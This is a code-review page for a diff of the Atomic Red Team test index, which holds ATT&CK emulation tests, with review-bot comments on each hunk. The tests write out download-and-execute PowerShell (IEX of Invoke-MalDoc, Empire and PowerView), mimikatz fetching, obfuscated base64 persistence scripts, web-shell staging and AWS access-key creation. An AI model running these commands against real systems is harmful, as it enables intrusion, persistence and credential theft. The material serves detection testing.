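Review bot: The new test writes `HKEY_LOCAL_MACHINE\SYSTEM\...\FirewallPolicy\PublicProfile`, which needs an elevated prompt, but no `elevation_required: true` is set on it; add that line after `name: command_prompt`. The description warns that cleanup "will re-enable firewall for the current profile" while both commands touch only `PublicProfile`; the warning should name the public profile. The cleanup also forces `EnableFirewall` to 1 regardless of the pre-test value, so a host that had the public-profile firewall off ends the test with it on, and where a domain firewall policy is in force the direct registry write may be overridden, which the description could caveat.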
@@ -25023,13 +25298,14 @@ defense-evasion:
command: |
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
'
name: powershell
- - name: Create a user called "$" as noted here
+ - name: Create a Hidden User Called "$"
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
description: Creating a user with a username containing "$"
supported_platforms:
@@ -27174,7 +27450,78 @@ defense-evasion:
x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- Anti-virus, Application control
- atomic_tests: []
+ identifier: T1553.005
+ atomic_tests:
+ - name: Mount ISO image
+ auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
+ description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web.
+ Upon successful execution, powershell will download the .iso from the Atomic
+ Red Team repo, and mount the image. The provided sample ISO simply has a Reports
+ shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ path_of_iso:
+ description: Path to ISO file
+ type: path
+ default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+ prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+ executor:
+ command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
+
+'
+ cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+
+'
+ name: powershell
+ - name: Mount an ISO image and run executable from the ISO
+ auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
+ description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web
+ and run hello.exe executable from the ISO. \nUpon successful execution, powershell
+ will download the .iso from the Atomic Red Team repo, mount the image, and
+ run the executable from the ISO image that will open command prompt echoing
+ \"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620
+ Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+ \ "
+ supported_platforms:
+ - windows
+ input_arguments:
+ path_of_iso:
+ description: Path to ISO file
+ type: path
+ default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+ prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+ executor:
+ command: |
+ $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+ $driveLetter = ($keep | Get-Volume).DriveLetter
+ invoke-item "$($driveLetter):\hello.exe"
+ cleanup_command: |
+ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+ Stop-process -name "hello" -Force -ErrorAction ignore
+ name: powershell
T1036.004:
technique:
external_references:
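Review bot: In the second test, cleanup runs `Dismount-DiskImage` before `Stop-process -name "hello"`, so if `hello.exe`, which was launched from the mounted ISO, is still running the dismount can fail or leave the volume attached; stop the process first, then dismount. Both `get_prereq_command`s download from the `master` branch with a bare `Invoke-WebRequest` and no TLS 1.2 line, while the other downloads in this change add one and several pin a commit; add the protocol line and pin the ISO URLs for consistency. The first test's cleanup also pipes `Dismount-DiskImage` to `Out-Null` without `-ErrorAction`, so a dismount failure surfaces only as an unhandled error.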
@@ -27406,7 +27753,33 @@ defense-evasion:
x_mitre_contributors:
- Yossi Weizman, Azure Defender Research Team
- Vishwas Manral, McAfee
- atomic_tests: []
+ identifier: T1036.005
+ atomic_tests:
+ - name: Execute a process from a directory masquerading as the current parent
+ directory.
+ auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+ description: 'Create and execute a process from a directory masquerading as
+ the current parent directory (`...` instead of normal `..`)
+
+'
+ supported_platforms:
+ - macos
+ - linux
+ input_arguments:
+ test_message:
+ description: Test message to echo out to the screen
+ type: String
+ default: Hello from the Atomic Red Team test T1036.005#1
+ executor:
+ name: sh
+ elevation_required: false
+ command: |
+ mkdir $HOME/...
+ cp $(which sh) $HOME/...
+ $HOME/.../sh -c "echo #{test_message}"
+ cleanup_command: |
+ rm -f $HOME/.../sh
+ rmdir $HOME/.../
T1556:
technique:
external_references:
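Review bot: `mkdir $HOME/...` with no `-p` fails when the directory already exists (for example after a previous run whose cleanup did not complete), and `$(which sh)` depends on `which` being installed where `command -v sh` is POSIX; `mkdir -p "$HOME/..."` and `cp "$(command -v sh)" "$HOME/..."` are more robust. `#{test_message}` is interpolated unquoted into `sh -c "echo ..."`, so shell metacharacters in the input argument are interpreted; the input is operator-controlled, but single-quoting it in the command keeps the test predictable.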
@@ -30570,7 +30943,8 @@ defense-evasion:
'
executor:
- command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+ command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+ (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
name: powershell
@@ -30704,7 +31078,8 @@ defense-evasion:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
name: powershell
- name: Remote Process Injection in LSASS via mimikatz
@@ -30740,6 +31115,7 @@ defense-evasion:
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -30752,6 +31128,7 @@ defense-evasion:
'
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -34247,30 +34624,26 @@ defense-evasion:
atomic_tests:
- name: WINWORD Remote Template Injection
auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
- description: 'Open a .docx file that loads a remote .dotm macro enabled template.
- Executes the code specified within the .dotm template.Requires download of
- WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens
- Calculator.exe when test sucessfully executed, while AV turned off.
-
-'
+ description: "Open a .docx file that loads a remote .dotm macro enabled template
+ from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
+ \nExecutes the code specified within the .dotm template.\nRequires download
+ of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
+ \ \nDefault docs file opens Calculator.exe when test sucessfully executed,
+ while AV turned off.\n"
supported_platforms:
- windows
input_arguments:
- docx file:
+ docx_file:
description: Location of the test docx file on the local filesystem.
type: Path
default: PathToAtomicsFolder\T1221\src\Calculator.docx
- dotm template:
- description: Location of the test dotm template on the remote server.
- type: Path
- default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
dependency_executor_name: powershell
dependencies:
- description: ''
prereq_command: ''
get_prereq_command: ''
executor:
- command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx
+ command: 'start #{docx_file}
'
name: command_prompt
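Review bot: `start #{docx_file}` misbehaves when the path contains spaces, because cmd's `start` treats the first quoted argument as a window title and splits an unquoted one; use `start "" "#{docx_file}"`. The single dependency entry has an empty description and empty `prereq_command`/`get_prereq_command`, so the test runs even when the .docx is missing; since `dependency_executor_name` is already powershell, `if (Test-Path "#{docx_file}") {exit 0} else {exit 1}` would report that. With the `dotm template` input removed, the remote template address is presumably fixed inside the .docx, and the description's `tree/master` link is the GitHub HTML page rather than the raw file; the description should make clear the URL is informational only.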
@@ -34801,8 +35174,9 @@ defense-evasion:
supported_platforms:
- windows
executor:
- command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
- -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
name: powershell
elevation_required: true
- name: "`SeDebugPrivilege` token duplication"
@@ -34813,8 +35187,9 @@ defense-evasion:
supported_platforms:
- windows
executor:
- command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
- -UseBasicParsing); Get-System -Technique Token -Verbose
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
name: powershell
elevation_required: true
T1205:
@@ -36382,6 +36757,39 @@ persistence:
'
name: powershell
+ - name: AWS - Create a group and add a user to that group
+ auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
+ description: 'Adversaries create AWS group, add users to specific to that group
+ to elevate their privilieges to gain more accesss
+
+'
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ username:
+ description: Name of the AWS group to create
+ type: String
+ default: atomicredteam
+ dependencies:
+ - description: 'Check if the user exists, we can only add a user to a group
+ if the user exists.
+
+'
+ prereq_command: 'aws iam list-users | grep #{username}
+
+'
+ get_prereq_command: 'echo Please run atomic test T1136.003, before running
+ this atomic test
+
+'
+ executor:
+ command: |
+ aws iam create-group --group-name #{username}
+ aws iam add-user-to-group --user-name #{username} --group-name #{username}
+ cleanup_command: |
+ aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+ aws iam delete-group --group-name #{username}
+ name: sh
T1547.014:
technique:
external_references:
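Review bot: `aws iam list-users | grep #{username}` in the prereq is a substring match over the whole JSON (user names and ARNs), so it passes for `atomicredteam2` or any ARN containing the string; `aws iam get-user --user-name #{username}` returns non-zero exactly when the user does not exist. The `username` input is described as "Name of the AWS group to create" but is used for both the user and the group; either fix the description or add a separate `group_name` argument. The description says the group is used to elevate privileges, yet no policy is attached, so the test only creates a group and a membership; the description should say that.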
@@ -36635,7 +37043,42 @@ persistence:
x_mitre_platforms:
- IaaS
- Azure AD
- atomic_tests: []
+ identifier: T1098.001
+ atomic_tests:
+ - name: AWS - Create Access Key and Secret Key
+ auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
+ description: 'Adversaries create their own new access and secret keys to programatically
+ interact with AWS environment, which is already compromised
+
+'
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ username:
+ description: Create new AWS access and secret keys for the user
+ type: String
+ default: atomicredteam
+ dependencies:
+ - description: 'Check if the user exists.
+
+'
+ prereq_command: 'aws iam list-users | grep #{username}
+
+'
+ get_prereq_command: 'echo Please run atomic test T1136.003, before running
+ this atomic
+
+'
+ executor:
+ command: |
+ aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+ cd $PathToAtomicsFolder/T1098.001/bin/
+ ./aws_secret.sh
+ cleanup_command: |
+ access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+ aws iam delete-access-key --access-key-id $access_key --user-name #{username}
+ rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+ name: sh
T1546.009:
technique:
external_references:
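Review bot: The executor writes the newly created AccessKeyId and SecretAccessKey in plaintext to `aws_secret.creds` inside the atomics tree, and only the cleanup deletes it, so a run that fails before cleanup leaves a live AWS secret on disk; at minimum set `umask 077` before the redirect (or write to a `mktemp` path) and use `rm -f`. The cleanup depends on `jq` but no dependency declares it, so on a host without `jq` the access key is never deleted; add a `which jq` prereq. `./aws_secret.sh` is run without any indication of what it does; a sentence in the description describing that script would help reviewers and operators.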
@@ -36802,7 +37245,8 @@ persistence:
computer starts up various applications and may in fact drive you crazy. A
reliable way to make the message box appear and verify the \nAppInit Dlls
are loading is to start the notepad application. Be sure to run the cleanup
- commands afterwards so you don't keep getting message boxes showing up\n"
+ commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
+ If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
supported_platforms:
- windows
input_arguments:
@@ -37435,7 +37879,7 @@ persistence:
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
- bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+ bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
@@ -38205,7 +38649,43 @@ persistence:
- Office 365
- IaaS
- Google Workspace
- atomic_tests: []
+ identifier: T1136.003
+ atomic_tests:
+ - name: AWS - Create a new IAM user
+ auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad
+ description: 'Creates a new IAM user in AWS. Upon successful creation, a new
+ user will be created. Adversaries create new IAM users so that their malicious
+ activity do not interupt the normal functions of the compromised users and
+ can remain undetected for a long time
+
+'
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ username:
+ description: Username of the IAM user to create in AWS
+ type: String
+ default: atomicredteam
+ dependencies:
+ - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+'
+ prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+'
+ get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+ defult profile using: aws configure
+
+'
+ executor:
+ command: 'aws iam create-user --user-name #{username}
+
+'
+ cleanup_command: 'aws iam delete-user --user-name #{username}
+
+'
+ name: sh
+ elevation_required: false
T1078.004:
technique:
id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
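Review bot: The prereq `cat ~/.aws/credentials | grep "default"` fails when credentials come from environment variables, an SSO profile, or an instance role, and passes when a `[default]` stanza exists but is stale; `aws sts get-caller-identity` checks what the test actually needs, a working default identity. The `get_prereq_command` message has a typo, `defult` should read `default`.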
@@ -39064,9 +39544,9 @@ persistence:
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
- description: After execution the Default Guest account will be enabled (Active)
- and added to Administrators and Remote Desktop Users Group, and desktop will
- allow multiple RDP connections
+ description: |
+ After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+ and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -39078,6 +39558,10 @@ persistence:
description: Specify the guest password
type: String
default: Password123!
+ remove_rdp_access_during_cleanup:
+ description: Set to 1 if you want the cleanup to remove RDP access to machine
+ type: Integer
+ default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -39090,8 +39574,9 @@ persistence:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+ if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
T1136.002:
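Review bot: With the new default of 0, the cleanup in this hunk now leaves the registry changes the executor made to "Terminal Server" in place, so a default run ends with the host still accepting the RDP connections the test enabled; the argument description added in the previous hunk (`@@ -39078`) should state that, e.g. `description: Set to 1 to have the cleanup remove the RDP access this test enables; the default (0) leaves RDP enabled after cleanup`. The `EQU 1` branches delete the two values outright rather than restoring their prior state, which matters on hosts where RDP was configured before the test. The same two hunks reappear under initial-access (`@@ -66962` and `@@ -66974`). The executor's command begins outside this hunk.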
@@ -41670,11 +42155,11 @@ persistence:
- windows
executor:
command: |
- reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
- if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+ reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+ mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
cleanup_command: |
- reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
name: command_prompt
T1137.001:
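Review bot: As far as I can tell, `reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f` with no `/v` creates a subkey named Level and writes the DWORD into its (Default) value, rather than setting a value named Level under the Security key, which is where the previous revision and the cleanup path suggest the setting is meant to live. If the intent is the Level value, the command should be `reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /t REG_DWORD /d 1 /f` and the cleanup `reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /f`, so the registry artifact defenders hunt for matches the documentation. Either way, the description (outside this hunk) should name the exact key and value the test touches.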
@@ -43942,7 +44427,8 @@ persistence:
'
executor:
- command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+ command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+ (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
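Review bot: The Invoke-MalDoc.ps1 script is now fetched from the mutable `master` branch and handed straight to IEX, with no commit pin and no hash check, so whatever is on that branch at run time executes with the tester's privileges; the PowerView hunks on this same page pin a commit SHA (`f94a5d298a1b4c5dfb1f30a246d9c73d13b22888`) and the T1003.001 docs use `Invoke-WebRequestVerifyHash`, so the repository already has both mechanisms. Pinning the URL to a commit, or downloading to a file and verifying its hash before IEX, would keep the test's behavior reproducible. The same unpinned pattern appears in the later Invoke-MalDoc hunks (`@@ -58178`, `@@ -58239`, `@@ -58277`, `@@ -58314`, `@@ -58448`, `@@ -59667`, `@@ -60546`, `@@ -60583`, `@@ -67695`) and in the AdFind.exe get_prereq_command (`@@ -49759`), where an unverified binary is downloaded from master.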
@@ -44860,6 +45346,48 @@ persistence:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
+ - name: Create Systemd Service file, Enable the service , Modify and Reload the
+ service.
+ auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+ description: "This test creates a systemd service unit file and enables it to
+ autostart on boot. Once service is created and enabled, it also modifies this
+ same service file showcasing both Creation and Modification of system process.
+ \n"
+ supported_platforms:
+ - linux
+ dependencies:
+ - description: 'System must be Ubuntu ,Kali OR CentOS.
+
+'
+ prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
+ /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
+ ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
+
+'
+ get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
+
+'
+ executor:
+ name: bash
+ elevation_required: true
+ command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
+ INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
+ : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
+ Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
+ os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+ +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
+ ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
+ defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
+ chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
+ OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
+ \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
+ | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
+ restart T1543.002\n"
+ cleanup_command: |
+ systemctl stop T1543.002
+ systemctl disable T1543.002
+ rm -rf /etc/init.d/T1543.002
+ systemctl daemon-reload
T1053.006:
technique:
id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
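Review bot: The prereq_command of the new T1543.002 test uses cmd.exe syntax, `exit /b 0` and `exit /b 1`, inside a bash check; in a POSIX shell `exit /b` is a numeric-argument error, so the prerequisite can never report success and the test will always be skipped by a runner that honours prereqs. The tail should read `then exit 0; else exit 1; fi;`. The test name and description speak of a systemd service unit, but what the executor writes is a SysV-style script under /etc/init.d, which is a different on-disk artifact for detection engineers; the description should say so. The base64 payloads appear to write marker files under /tmp that the cleanup_command does not remove — confirm and add matching `rm -f` lines, and the name's stray spaces ("Enable the service , Modify") should be tidied since it is rendered into the docs.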
@@ -45699,15 +46227,16 @@ persistence:
get_prereq_command: |
New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
executor:
- command: 'xcopy #{web_shells} #{web_shell_path}
-
-'
- cleanup_command: 'del #{web_shell_path} /q >nul 2>&1
+ command: 'xcopy /I /Y #{web_shells} #{web_shell_path}
'
+ cleanup_command: |
+ del #{web_shell_path}\b.jsp /q >nul 2>&1
+ del #{web_shell_path}\tests.jsp /q >nul 2>&1
+ del #{web_shell_path}\cmd.aspx /q >nul 2>&1
name: command_prompt
T1546.003:
technique:
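Review bot: The new `xcopy /I /Y` creates `#{web_shell_path}` when it does not already exist, but the rewritten cleanup_command deletes only the three copied files, so a directory the test itself created stays behind. If the path is expected to be test-created, append `rmdir #{web_shell_path} /q >nul 2>&1`, which is harmless when the directory is a pre-existing web root with other content. The get_prereq_command above still pulls the three shells from the mutable master branch without a hash check; pinning a commit would keep the staged files reproducible.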
@@ -46877,6 +47406,21 @@ impact:
cleanup_command: |
$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
rm #{encrypted_file_path}
+ - name: PureLocker Ransom Note
+ auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528
+ description: "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware
+ \nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n"
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
+
+'
+ cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
+
+'
T1565:
technique:
external_references:
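Review bot: `elevation_required: true` is not justified by the new PureLocker test's command, which only writes and deletes a file under `%USERPROFILE%\Desktop`; if no elevated privilege is needed, set it to `false` so the test runs in the standard-user context a ransom-note drop normally happens in, and the prerequisite for running it is not overstated in the docs. The description should also begin with a capital letter and name the artifact path, since it is rendered verbatim into the generated markdown.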
@@ -49663,10 +50207,9 @@ discovery:
supported_platforms:
- windows
executor:
- command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
- -UseBasicParsing); Find-LocalAdminAccess -Verbose
-
-'
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
name: powershell
- name: Find local admins on all machines in domain (PowerView)
auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
@@ -49678,10 +50221,9 @@ discovery:
supported_platforms:
- windows
executor:
- command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
- -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
-
-'
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
